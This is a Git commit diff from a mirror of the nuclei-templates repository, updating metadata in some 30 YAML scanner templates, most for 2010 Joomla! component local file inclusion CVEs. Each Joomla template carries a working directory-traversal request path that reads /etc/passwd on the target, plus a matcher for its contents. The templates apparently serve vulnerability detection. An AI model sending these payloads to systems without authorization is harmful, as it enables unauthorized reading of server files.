daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates into pr/3708

patch-1
sandeep 2022-02-15 11:43:16 +05:30
parent c3030e69ec 25938bc625
commit 65f155f2e1
44 changed files with 214 additions and 269 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
cnvd/2019/CNVD-2019-01348.yaml
View File

@ -3,15 +3,15 @@ id: CNVD-2019-01348
info:
name: Xiuno BBS CNVD-2019-01348
author: princechaddha
severity: medium
description: Xiuno BBS system has a system reinstallation vulnerability that could allow an attacker to directly reinstall the system through the installation page.
severity: high
description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
remediation: Upgrade to the latest version of Xiuno BBS or switch to a supported product.
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
tags: xiuno,cnvd,cnvd2019
remediation: There is currently no patch available.
classification:
cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 6.5
cwe-id: CWE-276
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 7.5
cwe-id: CWE-284
requests:
- method: GET

10
cves/2010/CVE-2010-1219.yaml
View File

@ -3,24 +3,24 @@ info:
name: Joomla! Component com_janews - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/11757
- https://www.cvedetails.com/cve/CVE-2010-1219
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1219
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

11
cves/2010/CVE-2010-1302.yaml
View File

@ -1,27 +1,26 @@
id: CVE-2010-1302
info:
name: Joomla! Component DW Graph - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/11978
- https://www.cvedetails.com/cve/CVE-2010-1302
tags: cve,cve2010,joomla,lfi,graph
classification:
cve-id: CVE-2010-1302
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

11
cves/2010/CVE-2010-1304.yaml
View File

@ -1,27 +1,26 @@
id: CVE-2010-1304
info:
name: Joomla! Component User Status - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/11998
- https://www.cvedetails.com/cve/CVE-2010-1304
tags: cve,cve2010,joomla,lfi,status
classification:
cve-id: CVE-2010-1304
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

11
cves/2010/CVE-2010-1305.yaml
View File

@ -1,27 +1,26 @@
id: CVE-2010-1305
info:
name: Joomla! Component JInventory 1.23.02 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12065
- https://www.cvedetails.com/cve/CVE-2010-1305
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1305
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

11
cves/2010/CVE-2010-1306.yaml
View File

@ -1,27 +1,26 @@
id: CVE-2010-1306
info:
name: Joomla! Component Picasa 2.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12058
- https://www.cvedetails.com/cve/CVE-2010-1306
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1306
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

11
cves/2010/CVE-2010-1307.yaml
View File

@ -1,27 +1,26 @@
id: CVE-2010-1307
info:
name: Joomla! Component Magic Updater - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12070
- https://www.cvedetails.com/cve/CVE-2010-1307
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1307
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

11
cves/2010/CVE-2010-1308.yaml
View File

@ -1,27 +1,26 @@
id: CVE-2010-1308
info:
name: Joomla! Component SVMap 1.1.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12066
- https://www.cvedetails.com/cve/CVE-2010-1308
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1308
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

11
cves/2010/CVE-2010-1312.yaml
View File

@ -1,27 +1,26 @@
id: CVE-2010-1312
info:
name: Joomla! Component News Portal 1.5.x - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12077
- https://www.cvedetails.com/cve/CVE-2010-1312
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1312
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

11
cves/2010/CVE-2010-1313.yaml
View File

@ -1,27 +1,26 @@
id: CVE-2010-1313
info:
name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12082
- https://www.cvedetails.com/cve/CVE-2010-1313
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1313
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

11
cves/2010/CVE-2010-1314.yaml
View File

@ -1,27 +1,26 @@
id: CVE-2010-1314
info:
name: Joomla! Component Highslide 1.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12086
- https://www.cvedetails.com/cve/CVE-2010-1314
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1314
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

11
cves/2010/CVE-2010-1315.yaml
View File

@ -1,27 +1,26 @@
id: CVE-2010-1315
info:
name: Joomla! Component webERPcustomer - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/11999
- https://www.cvedetails.com/cve/CVE-2010-1315
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1315
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

13
cves/2010/CVE-2010-1340.yaml
View File

@ -1,27 +1,26 @@
id: CVE-2010-1340
info:
name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/33797
- https://www.cvedetails.com/cve/CVE-2010-1340
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1340
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
- 200
# Enhanced by mp on 2022/02/14

11
cves/2010/CVE-2010-1345.yaml
View File

@ -1,27 +1,26 @@
id: CVE-2010-1345
info:
name: Joomla! Component Cookex Agency CKForms - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/15453
- https://www.cvedetails.com/cve/CVE-2010-1345
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1345
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

11
cves/2010/CVE-2010-1352.yaml
View File

@ -1,27 +1,26 @@
id: CVE-2010-1352
info:
name: Joomla! Component Juke Box 1.7 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12084
- https://www.cvedetails.com/cve/CVE-2010-1352
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1352
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

11
cves/2010/CVE-2010-1353.yaml
View File

@ -1,27 +1,26 @@
id: CVE-2010-1353
info:
name: Joomla! Component LoginBox - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
description: A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12068
- https://www.cvedetails.com/cve/CVE-2010-1353
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1353
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

9
cves/2010/CVE-2010-1354.yaml
View File

@ -4,24 +4,25 @@ info:
name: Joomla! Component VJDEO 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12102
- https://www.cvedetails.com/cve/CVE-2010-1354
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1354
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

9
cves/2010/CVE-2010-1461.yaml
View File

@ -4,24 +4,25 @@ info:
name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.
description: A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.
remediation: Upgrade to a supported version.
reference: |
- https://www.exploit-db.com/exploits/12232
- https://www.cvedetails.com/cve/CVE-2010-1461
tags: cve,cve2010,joomla,lfi,photo
classification:
cve-id: CVE-2010-1461
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

11
cves/2010/CVE-2010-1469.yaml
View File

@ -4,24 +4,25 @@ info:
name: Joomla! Component JProject Manager 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference: |
- https://www.exploit-db.com/exploits/12146
- https://www.cvedetails.com/cve/CVE-2010-1469
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1469
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
- 200
# Enhanced by mp on 2022/02/14

9
cves/2010/CVE-2010-1470.yaml
View File

@ -4,24 +4,25 @@ info:
name: Joomla! Component Web TV 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12166
- https://www.cvedetails.com/cve/CVE-2010-1470
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1470
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

9
cves/2010/CVE-2010-1471.yaml
View File

@ -4,24 +4,25 @@ info:
name: Joomla! Component Address Book 1.5.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12170
- https://www.cvedetails.com/cve/CVE-2010-1471
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1471
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

9
cves/2010/CVE-2010-1472.yaml
View File

@ -4,24 +4,25 @@ info:
name: Joomla! Component Horoscope 1.5.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12167
- https://www.cvedetails.com/cve/CVE-2010-1472
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1472
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

9
cves/2010/CVE-2010-1473.yaml
View File

@ -4,24 +4,25 @@ info:
name: Joomla! Component Advertising 0.25 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12171
- https://www.cvedetails.com/cve/CVE-2010-1473
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1473
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

9
cves/2010/CVE-2010-1474.yaml
View File

@ -4,24 +4,25 @@ info:
name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12182
- https://www.cvedetails.com/cve/CVE-2010-1474
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1474
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

9
cves/2010/CVE-2010-1475.yaml
View File

@ -4,24 +4,25 @@ info:
name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12147
- https://www.cvedetails.com/cve/CVE-2010-1475
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1475
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

9
cves/2010/CVE-2010-1476.yaml
View File

@ -4,24 +4,25 @@ info:
name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php.
description: A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12150
- https://www.cvedetails.com/cve/CVE-2010-1476
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1476
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

12
cves/2010/CVE-2010-1478.yaml
View File

@ -4,24 +4,26 @@ info:
name: Joomla! Component Jfeedback 1.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference: |
- https://www.exploit-db.com/exploits/12145
- https://www.cvedetails.com/cve/CVE-2010-1478
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1478
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
- 200
# Enhanced by mp on 2022/02/14

11
cves/2010/CVE-2010-1491.yaml
View File

@ -4,24 +4,25 @@ info:
name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12318
- https://www.cvedetails.com/cve/CVE-2010-1491
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1491
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
- 200
# Enhanced by mp on 2022/02/14

9
cves/2010/CVE-2010-1494.yaml
View File

@ -4,24 +4,25 @@ info:
name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12113
- https://www.cvedetails.com/cve/CVE-2010-1494
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1494
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/14

9
cves/2010/CVE-2010-1495.yaml
View File

@ -4,24 +4,25 @@ info:
name: Joomla! Component Matamko 1.01 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
